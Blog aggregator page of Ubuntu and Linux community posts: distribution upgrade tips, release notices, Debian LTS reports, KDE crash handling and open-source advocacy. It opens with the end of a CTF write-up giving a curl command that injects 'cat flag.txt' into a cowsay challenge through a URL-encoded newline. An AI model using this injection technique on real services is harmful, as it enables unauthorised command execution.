To send a parameter containing a newline, we merely need to URL encode (sometimes called percent encoding) the character, resulting in %0A. This can be exploited with a simple cURL command:

curl 'https://cow-say-what-473bf31e.challenges.bsidessf.net/' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'mode=-d%0acat flag.txt #&message=foo'

The -d%0a matches the regular expression, then we have a command injected (cat flag.txt) and start a comment (#) to just ignore the rest of the command.

< foo >
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
on June 07, 2022 07:00 AM

June 06, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 738 for the week of May 29 – June 4, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on June 06, 2022 10:56 PM

June 04, 2022

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong, is if your VPS is using a bootscript. A bootscript is a fixed way for booting your Linux server and this included a generic Scaleway-provided Linux kernel. You would be running Ubuntu but the Linux kernel would be a common Scaleway Linux kernel among all Linux distributions. The config options would be set in stone and that would cause some issues. That situation changed and Scaleway now uses the distro Linux kernels. But since Scaleway sent an email about old Linux versions, then you need to check this one out.

To verify, go into the Advanced Settings, in Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, then the Linux kernel will stay the same as instructed by the bootscript. The proper Boot Mode should be “Use local boot” so that your VPS is using your distro’s Linux kernel. Fun fact #39192: If you offer Ubuntu to your users but you do not use the Ubuntu kernel, then Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu” because it’s not really real Ubuntu (the Linux kernel is not a stock Ubuntu Linux kernel). Since around 2019 Scaleway would default with the Use local boot Boot Mode. In my case it was indeed Use local boot, therefore I did not have to deal with bootscripts. I just clicked on Use bootscript for the purposes for this post; I did not apply this change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access? Specifically, if you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens up a browser window that gives you access to the Linux Console of the server, over the web. It’s separate from SSH, therefore if SSH access is not available but the server is still running, you can still access here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox. Anything that is based on chromium should work fine. It is not clear why it does not work. If you try to place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and Public-Key Authentication. For what is worth, the account could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you are upgrading the distribution with Debian and Ubuntu, and you do so over SSH, the installer/upgrader will tell you that it will open a backup SSH server on a different port, like 1022. It will also tell you to open that port, if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall of your Scaleway servers. That is, you can block access to certain ports if you specify them in the Security Group, and you have assigned those Scaleway servers in that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sort of questions along the way. Most likely, the upgrader will ask if you want to keep back a certain configuration file, or if you want to have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
$ sudo do-release-upgrade

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform an upgrade there. By doing so, you will note that you will be asked

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked specifically which services to restart or let the system do these automatically. You would consider this if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration. Or your Web servers will not start automatically and you need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
Fast-forward, the upgrade completed and we connect with SSH. Are are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.


You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP and normally the PHP package should update automatically. It actually does update automatically. The problem is with the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP. In Ubuntu the Unix socket looks like /run/php/php7.4-fpm.sock.

Ubuntu version Filename for the PHP Unix socket
Ubuntu 16.04 /run/php/php7.0-fpm.sock
Ubuntu 18.04 /run/php/php7.2-fpm.sock
Ubuntu 20.04 /run/php/php7.4-fpm.sock
The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and edit the PHP socket directory with the updated filename for the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to FastCGI server listening on
location ~ .php$ {
     include snippets/fastcgi-php.conf;
     # # With php7.0-cgi alone:
     # fastcgi_pass;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;

A request

Scaleway, if you are reading this, please have a look at this feature request.

on June 04, 2022 03:51 PM

June 02, 2022

Lubuntu 21.10 (Impish Indri) was released October 14, 2021 and will reach End of Life on Thursday, July 14, 2022. This means that after that date there will be no further security updates or bugfixes released. After July 14th, the only supported releases of Lubuntu will be 20.04 and 22.04. All other releases of Lubuntu will […]
on June 02, 2022 11:14 PM

May 31, 2022

Full Circle Weekly News #264

Full Circle Magazine

SIMH simulator license dispute:

Vulnerability in the Linux perf kernel subsystem:

HP has announced a laptop that comes with Pop!_OS:

Ubuntu 22.10 will move to audio processing with PipeWire instead of PulseAudio:

Lotus 1-2-3 ported to Linux:

KDE Plasma 5.25 desktop testing:

DeepMind Opens Code for MuJoCo Physics Simulator:

Alpine Linux 3.16:

nginx 1.22.0 released:

Clonezilla Live 3.0.0 released:

Mir 2.8 display server released:

Roadmap for Budgie's user environment:

Release of the anonymous network I2P 1.8.0 and the C++ client i2pd 2.42:

AlmaLinux 9.0 distribution available:

Ubuntu developers begin to solve problems with the slow Firefox snap:

A hardwired password revealed in Linuxfx:

Full Circle Magazine
Host: bardmoss@pm.me, @bardictriad
Bumper: Canonical
Theme Music: From The Dust - Stardust
on May 31, 2022 07:05 PM

May 27, 2022

Full Circle Magazine #181

Full Circle Magazine

This month:
* Command & Conquer
* How-To : Python, Blender and Latex
* Graphics : Inkscape
* Everyday Ubuntu : KDE Science Pt.2
* Micro This Micro That
* Review : Ubuntu 22.04
* Review : Puppy Linux Slacko 7
* My Story : My Journey To Ubuntu 22.04
Ubports Touch
* Ubuntu Games : The Darkside Detective
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-181/

on May 27, 2022 04:28 PM

May 26, 2022

The Lubuntu Team is pleased to announce we are running a Kinetic Kudu artwork competition, giving you, our community, the chance to submit, and get your favorite wallpapers for both the desktop and the greeter/login screen (SDDM) included in the Lubuntu 22.10 release. Show Your Artwork To enter, simply post your image into this thread […]
on May 26, 2022 10:57 AM

May 25, 2022

DrKonqi ❤️ coredumpd

Harald Sitter

Get some popcorn and strap in for a long one! I shall delight you with some insights into crash handling and all that unicorn sparkle material.

Since Plasma 5.24 DrKonqi, Plasma’s infamous crash reporter, has gained support to route crashes through coredumpd and it is amazing – albeit a bit unused. That is why I’m telling you about it now because it’s matured a bit and is even more amazing – albeit still unused, I hope that will change.

To explain what any of this does I have to explain some basics first, so we are on the same page…

Most applications made by KDE will generally rely on KCrash, a KDE framework that implements crash handling, to, well, handle crashes. The way this works depends a bit on the operating system but one way or another when an application encounters a fault it first stops to think for a moment, about the meaning of life and whatever else, we call that “catching the crash”, during that time frame we can apply further diagnostics to help later figure out what went wrong. On POSIX systems specifically, we generate a backtrace and send that off to our bugzilla for handling by a developer – that is in essence the job of DrKonqi.

Currently DrKonqi operates in a mode of operation generally dubbed “just-in-time debugging”. When a crash occurs: KCrash immediately starts DrKonqi, DrKonqi attaches GDB to the still running process, GDB creates a backtrace, and then DrKonqi sends the trace along with metadata to bugzilla.

Just-in-time debugging is often useful on developer machines because you can easily switch to interactive debugging and also have a more complete picture of the environmental system state. For user systems it is a bit awkward though. You may not have time to deal with the report right now, you may have no internet connection, indeed the crash may be impossible to trace because of technical complications occurring during just-in-time debugging because of how POSIX signals work (threads continue running :O), etc.

In short: just-in-time really shouldn’t be the default.

Enter coredumpd.

Coredumpd is part of systemd and acts as kernel core handler. Ah, that’s a mouthful again. Let’s backtrace (pun intended)… earlier when I was talking about KCrash I only told part of the story. When fault occurs it doesn’t necessarily mean that the application has to crash, it could also neatly exit. It is only when the application takes no further action to alleviate the problem that the Linux kernel will jump in and do some rudimentary crash handling, forcefully. Very rudimentary indeed, it simply takes the memory state of the process and dumps it into a file. This is then aptly called a core dump. It’s kind of like a snapshot of the state of the process when the fault occurred and allows for debugging after the fact. Now things get interesting, don’t they? 🙂

So… KCrash can simply do nothing and let the Linux kernel do the work, and the Linux kernel can also be lazy and delegate the work to a so called core handler, an application that handles the core dumping. Well, here we are. That core handler can be coredumpd, making it the effective crash handler.

What’s the point you ask? — We get to be lazy!

Also, core dumping has one huge advantage that also is its disadvantage (depending on how you look at it): when a core dumps, the process is no longer running. When backtracing a core dump you are looking at a snapshot of the past, not a still running process. That means you can deal with crashes now or in 5 minutes or in 10 hours. So long as the core dump is available on disk you can trace the cause of the crash. This is further improved by coredumpd also storing a whole lot of metadata in journald. All put together it allows us to run drkonqi after-the-fact, instead of just-in-time. Amazing! I’m sure you will agree.

For the user everything looks the same, but under the hood we’ve gotten rid of various race conditions and gotten crash persistence across reboots for free!

Among other things this gives us the ability to look at past crashes. A GUI for which will be included in Plasma 5.25. Future plans also include the ability to file bug reports long after the fact.

Inner Workings

The way this works behind the scenes is somewhat complicated but should be easy enough to follow:

  • The application produces a fault
  • KCrash writes KCrash-specific metadata into a file on disk and doesn’t exit
  • The kernel issues a core dump via coredumpd
  • The systemd unit coredump@ starts
  • At the same time drkonqi-coredump-processor@ starts
  • The processor@ waits for coredump@ to finishes its task of dumping the core
  • The processor@ starts drkonqi-coredump-launcher@ in user scope
  • launcher@ starts DrKonqi with the same arguments as though it had been started just-in-time
  • DrKonqi assembles all the data to produce a crash report
  • the user is greeted by a crash notification just like just-in-time debugging
  • the entire crash reporting procedure is the same

Use It!

If you are using KDE neon unstable edition you are already using coredumpd based crash reporting for months! You haven’t even noticed, have you? 😉

If not, here’s your chance to join the after-the-fact club of cool kids.


in your `/etc/environment` and make sure your distribution has enabled the relevant systemd units accordingly.

on May 25, 2022 07:59 PM

May 24, 2022

Mixtape: Jardin De Amor

Daniel Holbach


Check in here for an hour-long trip around the globe and experience a few of my new favorites. Sometimes a little trippy and dreamy, but all very danceable…

  1. JÇÃO & Caracas Dub - Suena la decadente
  2. Los Destellos - Jardin De Amor (David Pacheco & Tribilin Sound Remix)
  3. VON Krup Feat. Alekzal - Fosfenos (jiony Remix)
  4. Ka Moma - Lamba Da Di (Harro Triptrap Edit)
  5. Eartha Kitt - Angelitos Negros (Billy Caso’s Sliced Sky Remix)
  6. hubbabubbaklubb - Mopedbart (Barda Edit)
  7. Crussen - Bufarsveienen
  8. Josephine Baker - La Conga Blicoti (Polo & Pan Remix)
  9. Gene Farris & Kid Enigma - David Copperfield
  10. Viidra - Mitally
  11. Quantic - You Used to Love Me feat. Denitia (Selva Remix)
  12. Dombrance - Taubira (Prins Thomas Diskomiks)
on May 24, 2022 01:00 PM

May 22, 2022

Small EInk Phone

Bryan Quigley

Aside in 2022-05-22. it's not the same.. but there is a renewed push by Pebble creator Eric Migicovsky to show demand for a SmallAndroidPhone. It's currently at about 29,000.

Update 2022-02-26: Only got 12 responses which likely means there isn't that much demand for this product at this time (or it wasn't interesting enough to spread). Here are the results as promised:

What's the most you would be willing to spend on this? 7 - $200, 4 - $400. But that doesn't quite capture it. Some wanted even cheaper than $200 (which isn't doable) and others were will to spend a lot more.

Of the priority's that got at least 2 people agreeing (ignoring rating): 4 - Openness of components, Software Investments 3 - Better Modem, Headphone Jack, Cheaper Price 2 - Convergence Capable, Color eInk, Replaceable Battery

I'd guess about half of the respondents would likely be happy with a PinePhone (Pro) that got better battery life and "Just Works".

End Update.

Would you be interested in crowdfunding a small E Ink Open Phone? If yes, check out the specs and fill out the form below.

If I get 1000 interested people, I'll approach manufacturers. I plan to share the results publicly in either case. I will never share your information with manufacturers but contact you by email if this goes forward.


  • Small sized for 2021 (somewhere between 4.5 - 5.2 inches)
  • E Ink screen (Maybe Color) - battery life over playing videos/games
  • To be shipped with one of the main Linux phone OSes (Manjaro with KDE Plasma, etc).
  • Low to moderate hardware specs
  • Likely >6 months from purchase to getting device

Minimum goal specs (we might be able to do much better than these, but again might not):

  • 4 Core
  • 32 GB Storage
  • USB Type-C (Not necessarily display out capable)
  • ~8 MP Front camera
  • GPS
  • GSM Modem (US)

Software Goals:

  • Only open source apps pre-installed
  • Phone calls
  • View websites / webapps including at least 1 rideshare/taxi service working (may not be official)
  • 2 day battery life (during "normal" usage)

Discussions: Phoronix

on May 22, 2022 04:30 AM

May 20, 2022

Are you using Kubuntu 22.04 Jammy Jellyfish, our current Stable release? Or are you already running our development builds of the upcoming 22.10 Kinetic Kudu?

We currently have Plasma 5.24.90 (Plasma 5.25 Beta)  available in our Beta PPA for Kubuntu 22.04, and in the Ubuntu archive and daily ISO build for the 22.10 development series.

However this is a beta release, and we should re-iterate the disclaimer from the upstream release announcement:

DISCLAIMER: Today we are bringing you the preview version of KDE’s Plasma 5.25 desktop release. Plasma 5.25 Beta is aimed at testers, developers, and bug-hunters. To help KDE developers iron out bugs and solve issues, install Plasma 5.25 Beta and test run the features listed below. Please report bugs to our bug tracker. We will be holding a Plasma 5.25 beta review day on May 26 (details will be published on our social media) and you can join us for a day of bug-hunting, triaging and solving alongside the Plasma devs! The final version of Plasma 5.25 will become available for the general public on the 14th of June. DISCLAIMER: This release contains untested and unstable software. It is highly recommended you do not use this version in a production environment and do not use it as your daily work environment. You risk crashes and loss of data.


Testers of the Kubuntu 22.10 Kinetic Kudu development series:

Testers with a current install can simply upgrade their packages to install the 5.25 Beta.

Alternatively, a live/install image is available at: http://cdimage.ubuntu.com/kubuntu/daily-live/current/

Users on Kubuntu 22.04 Jammy Jellyfish:

5.25 Beta packages and required dependencies are available in our Beta PPA.

The PPA should work whether you are currently using our backports PPA or not.

If you are prepared to test via the PPA, then…..

Add the beta PPA and then upgrade:

sudo add-apt-repository ppa:kubuntu-ppa/beta && sudo apt full-upgrade -y

Then reboot.

In case of issues, testers should be prepared to use ppa-purge to remove the PPA and revert/downgrade packages.

Kubuntu is part of the KDE community, so this testing will benefit both Kubuntu as well as upstream KDE Plasma software, which is used by many other distributions too.

  • If you believe you might have found a packaging bug, you can use launchpad.net to post testing feedback to the Kubuntu team as a bug, or give feedback on IRC [1], or mailing lists [2].
  • If you believe you have found a bug in the underlying software, then bugs.kde.org is the best place to file your bug report.

Please review the release announcement and changelog.

[Test Case]
* General tests:
– Does plasma desktop start as normal with no apparent regressions over 5.24?
– General workflow – testers should carry out their normal tasks, using the plasma features they normally do, and test common subsystems such as audio, settings changes, compositing, desktop affects, suspend etc.
* Specific tests:
– Check the changelog:
– Identify items with front/user facing changes capable of specific testing.
– Test the ‘fixed’ functionality or ‘new’ feature.

Testing may involve some technical set up to do, so while you do not need to be a highly advanced K/Ubuntu user, some proficiently in apt-based package management is advisable.

Testing is very important to the quality of the software Ubuntu and Kubuntu developers package and release.

We need your help to get this important beta release in shape for Kubuntu and the KDE community as a whole.


Please stop by the Kubuntu-devel IRC channel on libera.chat if you need clarification of any of the steps to follow.

[1] – #kubuntu-devel on libera.chat
[2] – https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel

on May 20, 2022 05:06 PM

May 10, 2022

Here’s my (thirty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 41st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions and things bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 16th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-second month as a Debian LTS and twenty-third month as a Debian ELTS paid contributor.
I worked for 35.00 hours for LTS and 30.00 hours for ELTS.

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Triaged cifs-utils, vim, elog, needrestart, amd64-microcode, libgoogle-gson-java, lrzip, and mutt.
  • Started as a Freexian Collaborator! \o/
  • Read through the documentation bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • Participated and helped fellow members with theie queries via private mail and chat.
  • General and other discussions on LTS private and public mailing list.

Debian LTS Survey

I’ve spent 2 hours on the LTS survey on the following bits:

  • Finalizing and wrapping up the survey.
  • Providing the stats, working on the initial export of the survey.
  • Dropping ghost entries and other things which are useless. :)

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

Here’s my (thirty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 40th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

  • Helped Andrius w/ FTBFS for php-text-captcha, reported via #977403.
    • I fixed the samed in Ubuntu a couple of months ago and they copied over the patch here.

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions of referees and attendees around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 15th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-first month as a Debian LTS and twentieth month as a Debian ELTS paid contributor.
I worked for 23.25 hours for LTS and 20.00 hours for ELTS.

LTS CVE Fixes and Announcements:

  • Issued DLA 2976-1, fixing CVE-2022-1271, for gzip.
    For Debian 9 stretch, these problems have been fixed in version 1.6-5+deb9u1.
  • Issued DLA 2977-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 9 stretch, these problems have been fixed in version 5.2.2-1.2+deb9u1.
  • Working on src:tiff and src:mbedtls to fix the issues, still waiting for more issues to be reported, though.
  • Looking at src:mutt CVEs. Haven’t had the time to complete but shall roll out next month.

ELTS CVE Fixes and Announcements:

  • Issued ELA 593-1, fixing CVE-2022-1271, for gzip.
    For Debian 8 jessie, these problems have been fixed in version 1.6-4+deb8u1.
  • Issued ELA 594-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 8 jessie, these problems have been fixed in version 5.1.1alpha+20120614-2+deb8u1.
  • Issued ELA 598-1, fixing CVE-2019-16935, CVE-2021-3177, and CVE-2021-4189, for python2.7.
    For Debian 8 jessie, these problems have been fixed in version 2.7.9-2-ds1-1+deb8u9.
  • Working on src:tiff and src:beep to fix the issues, still waiting for more issues to be reported for src:tiff and src:beep is a bit of a PITA, though. :)

Other (E)LTS Work:

  • Triaged gzip, xz-utils, tiff, beep, python2.7, python-django, and libgit2,
  • Signed up to be a Freexian Collaborator! \o/
  • Read through some bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.
  • Attended monthly Debian meeting. Held on Jitsi this month.

Debian LTS Survey

I’ve spent 18 hours on the LTS survey on the following bits:

  • Rolled out the announcement. Started the survey.
  • Answered a bunch of queries, people asked via e-mail.
  • Looked at another bunch of tickets: https://salsa.debian.org/freexian-team/project-funding/-/issues/23.
  • Sent a reminder and fixed a few things here and there.
  • Gave a status update during the meeting.
  • Extended the duration of the survey.

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

May 04, 2022

Contributing to any open-source project is a great way to spend a few hours each month. I started more than 10 years ago, and it has ultimately shaped my career in ways I couldn’t have imagined!

GitLab logo as cover

The new GitLab logo, just announced on the 27th April 2022.

Nowadays, my contributions focus mostly on GitLab, so you will see many references to it in this blog post, but the content is quite generalizable; I would like to share my experience to highlight why you should consider contributing to an open-source project.

Writing blog posts, tweeting, and helping foster the community are nice ways to contribute to a project ;-)

And contributing doesn’t mean only coding: there are countless ways to help an open-source project: translating it to different languages, reporting issues, designing new features, writing the documentation, offering support on forums and StackOverflow, and so on.

Before deep diving in this wall of text, be aware there are mainly three parts in this blog post, after this introduction: a context section, where I describe my personal experience with open source, and what does it mean to me. Then, a nice list of reasons to contribute to any project. In closing, there are some tips on how to start contributing, both in general, and something specific to GitLab.


Ten years ago, I was fresh out of high school, without (almost) any knowledge about IT: however, I found out that I had a massive passion for it, so I enrolled in a Computer Engineering university (boring!), and I started contributing to Ubuntu (cool!). I began with the Italian Local Community, and I soon moved to Ubuntu Touch.

I often considered rewriting that old article: however I have a strange attachment to it as it is, with all that English mistakes. One of the first blog posts I have written, and it was really well received! We all know how it ended, but it still has been a fantastic ride, with a lot of great moments: just take a look at the archive of this blog, and you can see the passion and the enthusiasm I had. I was so enthusiast, that I wrote a similar blog post to this one! I think it highlights really well some considerable differences 10 years make.

Back then, I wasn’t working, just studying, so I had a lot of spare time. My English was way worse. I was at the beginning of my journey in the computer world, and Ubuntu has ultimately shaped a big part of it. My knowledge was very limited, and I never worked before. Contributing to Ubuntu gave me a glimpse of real world, I met outstanding engineers who taught me a lot, and boosted my CV, helping me to land my first job.

Advocacy, as in this blog post, is a great way to contribute! You spread awareness, and this helps to find new contributors, and maybe inspiring some young student to try out! Since then, I completed a master’s degree in C.S., worked in different companies in three different countries, and became a professional. Nowadays, my contributions to open source are more sporadic (adulthood, yay), but given how much it meant to me, I am still a big fan, and I try to contribute when I can, and how I can.

Why contributing


During my years contributing to open-source software, I’ve met countless incredible people, with some of whom I’ve become friend. In the old blog post I mentioned David: in the last 9 years we stayed in touch, met in different occasions in different cities: last time was as recent as last summer. Back at the time, he was a Manager in the Ubuntu Community Team at Canonical, and then, he became Director of Community Relations at GitLab. Small world!

The Ubuntu Touch Community Team in Malta, in 2014

The Ubuntu Touch Community Team in Malta, in 2014. It has been an incredible week, sponsored by Canonical!

One interesting thing is people contribute to open-source projects from their homes, all around the world: when I travel, I usually know somebody living in my destination city, so I’ve always at least one night booked for a beer with somebody I’ve met only online; it’s a pleasure to speak with people from different backgrounds, and having a glimpse in their life, all united by one common passion.


Having fun is important! You cannot spend your leisure time getting bored or annoyed: contributing to open source is fun ‘cause you pick the problems you would like to work on, and you don’t need all that bureaucracy and meetings that is often needed in your daily job. You can be challenged, and feeling useful, and improving a product, without any manager on your shoulder, and with your pace.

Being up-to-date on how things evolve

For example, the GitLab Handbook is a precious collection of resources, ideas, and methodologies on how to run a 1000 people company in a transparent, full remote, way. It’s a great reading, with a lot of wisdom.

Contributing to a project typically gives you an idea on how teams behind it work, which technologies they use, and which methodologies. Many open-source projects use bleeding-edge technologies, or draw a path. Being in contact with new ideas is a great way to know where the industry is headed, and what are the latest news: it is especially true if you hang out in the channels where the community meets, being them Discord, forums, or IRC (well, IRC is not really bleeding-edge, but it is fun).


When contributing in an area that doesn’t match your expertise, you always learn something new: reviews are usually precise and on point, and projects of a remarkable size commonly have a coaching team that help you to start contributing, and guide you on how to land your first patches.

In GitLab, if you need a help in merging your code, there are the Merge Request Coaches! And for any type of help, you can always join Gitter, or ask on the forum, or write to the dedicated email address.

Feel also free to ping me directly if you want some general guidance!

Giving back

I work as a Platform Engineer. My job is built on an incredible amount of open-source libraries, amazing FOSS services, and I basically have just to glue together different pieces. When I find some rough edge that could be improved, I try to do so.

Nowadays, I find crucial having well-maintained documentation, so after I have achieved something complex, I usually go back and try to improve the documentation, where lacking. It is my tiny way to say thanks, and giving back to a world that really has shaped my career.

This is also what mostly of my blogs posts are about: after having completed something on which I spent fatigue on, I find it nice being able to share such information. Every so often, I find myself years later following my guide, and I really also appreciate when other people find the content useful.


Who doesn’t like swag? :-) Numerous projects have delightful swags, starting from stickers, that they like to share with the whole community. Of course, it shouldn’t be your main driver, ‘cause you will soon notice that it is ultimately not worth the amount of time you spend contributing, but it is charming to have GitLab socks!

A GitLab branded mechanical keyboard

A GitLab branded mechanical keyboard, courtesy of the GitLab's security team! This very article has been typed with it!


I hope I inspired you to contribute to some open-source project (maybe GitLab!). Now, let’s talk about some small tricks on how to begin easily.

Find something you are passionate about

You must find a project you are passionate about, and that you use frequently. Looking forward to a release, knowing that your contributions will be included, it is a wonderful satisfaction, and can really push you to do more.

Moreover, if you already know the project you want to contribute to, you probably know already the biggest pain points, and where the project needs some contributions.

Start small and easy

You don’t need to do gigantic contributions to begin. Find something tiny, so you can get familiar with the project workflows, and how contributions are received.

Launchpad and bazaar instead of GitLab and git — down the memory lane! My journey with Ubuntu started correcting a typo in a README, and here I am, years later, having contributed to dozens of projects, and having a career in the C.S. field. Back then, I really had no idea of what my future would have held.

For GitLab, you can take a look at the issues marked as “good for new contributors”. They are designed to be addressed quickly, and onboard new people in the community. In this way, you don’t have to focus on the difficulties of the task at hand, but you can easily explore how the community works.

Writing issues is a good start

Writing high-quality issues is a great way to start contributing: maintainers of a project are not always aware of how the software is used, and cannot be aware of all the issues. If you know that something could be improved, write it down: spend some time explicating what happens, what you expect, how to reproduce the problem, and maybe suggest some solutions as well! Perhaps, the first issue you write down could be the very first issue you resolve.

Not much time required!

Contributing to a project doesn’t require necessarily a lot of time. When I was younger, I definitely dedicated way more time to open-source projects, implementing gigantic features. Nowadays, I don’t do that anymore (life is much more than computers), but I like to think that my contributions are still useful. Still, I don’t spend more than a couple of hours a month, based on my schedule, and how much is raining (yep, in winter I definitely contribute more than in summer).

GitLab is super easy

Do you use GitLab? Then you should undoubtedly try to contribute to it. It is easy, it is fun, and there are many ways. Take a look at this guide, hang out on Gitter, and see you around. ;-)

Next week (9th-13th May 2022) there is also a GitLab Hackathon! It is a real fun and easy way to start contributing: many people are available to help you, there are video sessions talking about contributing, and just doing a small contribution you will receive a pretty prize.

And if I was able to do it with my few contributions, you can as well! And in time, if you are consistent in your contributions, you can become a GitLab Hero! How cool is that?

I really hope this wall of text made you consider contributing to an open-source project. If you have any question, or feedback, or if you would like some help, please leave a comment below, tweet me @rpadovani93 or write me an email at hello@rpadovani.com.


on May 04, 2022 12:00 AM

May 02, 2022

Sorry, I should have posted this weeks ago to save others some time.

If you are running openconnect-sso to connect to a Cisco anyconnect VPN, then when you upgrade to Ubuntu Jammy, openssl 3.0 may stop openconnect from working. The easiest way to work around this is to use a custom configuration file as follows:

cat > $HOME/ssl.cnf
openssl_conf = openssl_init

ssl_conf = ssl_sect

system_default = system_default_sect

Options = UnsafeLegacyRenegotiation

Then use this configuration file (only) when running openconnect:

OPENSSL_CONF=~/ssl.cnf openconnect-sso --server=your-server.whatever.com

on May 02, 2022 02:39 PM

Over the last few weeks, GStreamer’s RTP stack got a couple of new and quite useful features. As it is difficult to configure, mostly because there being so many different possible configurations, I decided to write about this a bit with some example code.

The features are RFC 6051-style rapid synchronization of RTP streams, which can be used for inter-stream (e.g. audio/video) synchronization as well as inter-device (i.e. network) synchronization, and the ability to easily retrieve absolute sender clock times per packet on the receiver side.

Note that each of this was already possible before with GStreamer via different mechanisms with different trade-offs. Obviously, not being able to have working audio/video synchronization would be simply not acceptable and I previously talked about how to do inter-device synchronization with GStreamer before, for example at the GStreamer Conference 2015 in Düsseldorf.

